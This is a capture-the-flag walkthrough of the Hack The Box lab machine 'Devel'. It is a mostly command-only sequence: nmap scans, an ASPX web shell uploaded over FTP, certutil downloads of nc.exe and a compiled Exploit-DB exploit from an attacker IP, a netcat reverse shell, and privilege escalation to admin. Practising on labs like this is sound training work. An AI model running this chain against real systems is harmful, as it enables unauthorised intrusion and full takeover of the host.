Ping
ping 10.10.10.5
Nmap Initial Scan
nmap -p- --min-rate 10000 10.10.10.5 -oN inmap
Nmap Script and Service Scan
nmap 10.10.10.5 -sCV -oN snamp
FTP Enumeration
Looks like as aspnet website, so will transfer our cmdasp.aspx file
put cmdasp.aspx
Now will request the cmdasp.aspx
Coooool, we got RCE
whoami
Will Get a reverse shell using this RCE
certutil -urlcache -f http://10.10.14.2/nc.exe c:/windows/temp/nc.exe
dir C:\windows\temp
We can see our nc.exe, so its time to get a reverse shell
C:\windows\temp\nc.exe -e cmd.exe 10.10.14.2 443
We got reverse shell
rlwrap nc -nvlp 443
Will see our Privileges
whoami /priv
Cool, we have impersonation privilege
But, after some hard tries, i can’t use impersonate privilege to escalate my Privilege
Will try build Exploit for out target system
systeminfo
Got it I guess, Its a vulnerable build
Will find public exploit for the vulnerable build
We are using the Exploit-db’s exploit https://www.exploit-db.com/exploits/40564
Will use this accordingly
i686-w64-mingw32-gcc exp.c -o exp.exe -lws2_32
I have saved the exploit code in file named exp.c
And I have transferred the exploit to the target machine
certutil -urlcache -f http://10.10.14.2:8080/exp.exe c:/users/public/exp.exe
Will run the exploit
exp.exe
Cooool, We are admin now…!
Found the flags location
dir /s /b C:\user.txt
dir /s /b C:\root.txt
Retrieved the flags
User.txt
root.txt
Done with Devel…..:)